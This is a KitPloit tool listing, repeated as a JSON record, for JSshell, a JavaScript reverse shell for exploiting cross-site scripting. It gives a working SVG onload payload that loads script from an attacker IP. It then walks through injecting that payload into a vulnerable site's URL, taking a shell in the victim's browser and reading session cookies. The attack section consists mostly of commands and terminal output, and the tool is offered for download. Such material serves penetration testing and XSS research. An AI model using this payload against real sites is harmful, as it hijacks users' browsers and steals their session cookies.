[](<https://1.bp.blogspot.com/-n8BaIm82kvg/Xss1tk-mNPI/AAAAAAAASrE/GfU5VEa22PwWq3y7cqvWpO0yIjTC5uKxACNcBGAsYHQ/s1600/JSshell.png>)
JSshell - a JavaScript [reverse](<https://www.kitploit.com/search/label/Reverse> "reverse" ) shell. This using for exploit XSS remotely, help to find blind XSS, ...
This tool works for both Unix and Windows operating system and it can running with both Python 2 and Python 3. This is a big update of JShell - a tool to get a JavaScript shell with XSS by s0med3v. JSshell also doesn't require Netcat (different from other javascript shells).
**Usage**
**Generate JS reverse shell payload: `-g`**
**Set the local port number for listening and generating [payload](<https://www.kitploit.com/search/label/Payload> "payload" ) (By default, it will be set to 4848): `-p`**
**Set the local source address for generating payload (JSshell will detect your IP address by deault): `-s`**
**Set timeout for shell connection (if the user exit page, the shell will be pause, and if your set the timeout, after a while without response, the shell will automatically close): `-w`**
**Execute a command when got the shell: `-c`**
**Example usages:**
* `js.py`
* `js.py -g`
* `js.py -p 1234`
* `js.py -s 48.586.1.23 -g`
* `js.py -c "alert(document.cookie)" -w 10`
**An example for running JSshell:**
This is an example for step-by-step to exploit remote XSS using JSshell.
First we will generate a reverse JS shell payload and set the shell timeout is 20 seconds:
~# whoami
root
~# ls
README.md js.py
~# python3 js.py -g -w 20
__
|(_ _ |_ _ | |
\_|__)_> | |(/_ | |
v1.0
Payload:
<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},999)>
Listening on [any] 4848 for incoming JS shell ...
Now paste this payload to the website (or URL) that [vulnerable](<https://www.kitploit.com/search/label/Vulnerable> "vulnerable" ) to XSS:
`https://vulnwebs1te.com/b/search?q=<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},1248)>`
Access the page and now we will see that we have got the reverse JS shell:
__
|(_ _ |_ _ | |
\_|__)_> | |(/_ | |
v1.0
Payload:
<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},999)>
Listening on [any] 4848 for incoming JS shell ...
Got JS shell from [75.433.24.128] port 39154 to DESKTOP-1GSL2O2 4848
$ established
$ the
$ shell
$
$
$ help
JSshell using javascript code as shell commands. Also supports some commands:
help This help
exit, quit Exit the JS shell
$
Now let's execute some commands:
$ var test = 'hacked'
$ alert(hacked)
$
And the browser got an alert: `hacked`
$ prompt(document.cookie)
$
And the browser print the user cookies: `JSESSION=3bda8...`
$ exit
~# whoami
root
~# pwd
/home/shelld3v
~#
And we quited!
**Author**
This created by shelld3v, [hacking](<https://www.kitploit.com/search/label/Hacking> "hacking" ) at HackOne and Bugcrowd with a secret account! This tool is inspired by JShell (s0med3v), using the BruteLogic payload. JSshell 2.0 will has some new features that include:
* More payloads for `<img>`, `<script>`, ...
* Some shortcut commands: print the current session, domain, endpoint, ...
* Better GUI
...
**[Download JSshell](<https://github.com/shelld3v/JSshell> "Download JSshell" )**
{"id": "KITPLOIT:2751138742638729202", "vendorId": null, "type": "kitploit", "bulletinFamily": "tools", "title": "JSshell - A JavaScript Reverse Shell For Exploiting XSS Remotely Or Finding Blind XSS, Working With Both Unix And Windows OS", "description": "[](<https://1.bp.blogspot.com/-n8BaIm82kvg/Xss1tk-mNPI/AAAAAAAASrE/GfU5VEa22PwWq3y7cqvWpO0yIjTC5uKxACNcBGAsYHQ/s1600/JSshell.png>)\n\n \nJSshell - a JavaScript [reverse](<https://www.kitploit.com/search/label/Reverse> \"reverse\" ) shell. This using for exploit XSS remotely, help to find blind XSS, ... \nThis tool works for both Unix and Windows operating system and it can running with both Python 2 and Python 3. This is a big update of JShell - a tool to get a JavaScript shell with XSS by s0med3v. JSshell also doesn't require Netcat (different from other javascript shells). \n \n**Usage** \n \n**Generate JS reverse shell payload: `-g`** \n \n**Set the local port number for listening and generating [payload](<https://www.kitploit.com/search/label/Payload> \"payload\" ) (By default, it will be set to 4848): `-p`** \n \n**Set the local source address for generating payload (JSshell will detect your IP address by deault): `-s`** \n \n**Set timeout for shell connection (if the user exit page, the shell will be pause, and if your set the timeout, after a while without response, the shell will automatically close): `-w`** \n \n**Execute a command when got the shell: `-c`** \n \n**Example usages:** \n\n\n * `js.py`\n * `js.py -g`\n * `js.py -p 1234`\n * `js.py -s 48.586.1.23 -g`\n * `js.py -c \"alert(document.cookie)\" -w 10`\n \n**An example for running JSshell:** \nThis is an example for step-by-step to exploit remote XSS using JSshell. \nFirst we will generate a reverse JS shell payload and set the shell timeout is 20 seconds: \n\n \n \n ~# whoami\n root\n ~# ls\n README.md js.py\n ~# python3 js.py -g -w 20\n __\n |(_ _ |_ _ | |\n \\_|__)_> | |(/_ | |\n v1.0\n \n Payload:\n <svg/onload=setInterval(function(){with(document)body.appendChild(createElement(\"script\")).src=\"//171.224.181.106:4848\"},999)>\n \n Listening on [any] 4848 for incoming JS shell ...\n\nNow paste this payload to the website (or URL) that [vulnerable](<https://www.kitploit.com/search/label/Vulnerable> \"vulnerable\" ) to XSS: \n`https://vulnwebs1te.com/b/search?q=<svg/onload=setInterval(function(){with(document)body.appendChild(createElement(\"script\")).src=\"//171.224.181.106:4848\"},1248)>` \nAccess the page and now we will see that we have got the reverse JS shell: \n\n \n \n __\n |(_ _ |_ _ | |\n \\_|__)_> | |(/_ | |\n v1.0\n \n Payload:\n <svg/onload=setInterval(function(){with(document)body.appendChild(createElement(\"script\")).src=\"//171.224.181.106:4848\"},999)>\n \n Listening on [any] 4848 for incoming JS shell ...\n Got JS shell from [75.433.24.128] port 39154 to DESKTOP-1GSL2O2 4848\n $ established\n $ the\n $ shell\n $\n $\n $ help\n JSshell using javascript code as shell commands. Also supports some commands:\n help This help\n exit, quit Exit the JS shell\n $\n\nNow let's execute some commands: \n\n \n \n $ var test = 'hacked'\n $ alert(hacked)\n $\n\nAnd the browser got an alert: `hacked` \n\n \n \n $ prompt(document.cookie)\n $\n\nAnd the browser print the user cookies: `JSESSION=3bda8...` \n\n \n \n $ exit\n ~# whoami\n root\n ~# pwd\n /home/shelld3v\n ~#\n\nAnd we quited! \n \n**Author** \nThis created by shelld3v, [hacking](<https://www.kitploit.com/search/label/Hacking> \"hacking\" ) at HackOne and Bugcrowd with a secret account! This tool is inspired by JShell (s0med3v), using the BruteLogic payload. JSshell 2.0 will has some new features that include: \n\n\n * More payloads for `<img>`, `<script>`, ...\n * Some shortcut commands: print the current session, domain, endpoint, ...\n * Better GUI \n...\n \n \n\n\n**[Download JSshell](<https://github.com/shelld3v/JSshell> \"Download JSshell\" )**\n", "published": "2020-06-06T21:30:00", "modified": "2020-06-06T21:30:06", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "http://www.kitploit.com/2020/06/jsshell-javascript-reverse-shell-for.html", "reporter": "KitPloit", "references": ["https://github.com/shelld3v/JSshell"], "cvelist": [], "immutableFields": [], "lastseen": "2022-04-07T12:02:53", "viewCount": 213, "enchantments": {"dependencies": {}, "score": {"value": 0.1, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "_state": {"dependencies": 1659876597, "score": 1659818015}, "_internal": {"score_hash": "db120ae01ada674c4717ff3f4c9b0b63"}, "toolHref": "https://github.com/shelld3v/JSshell"}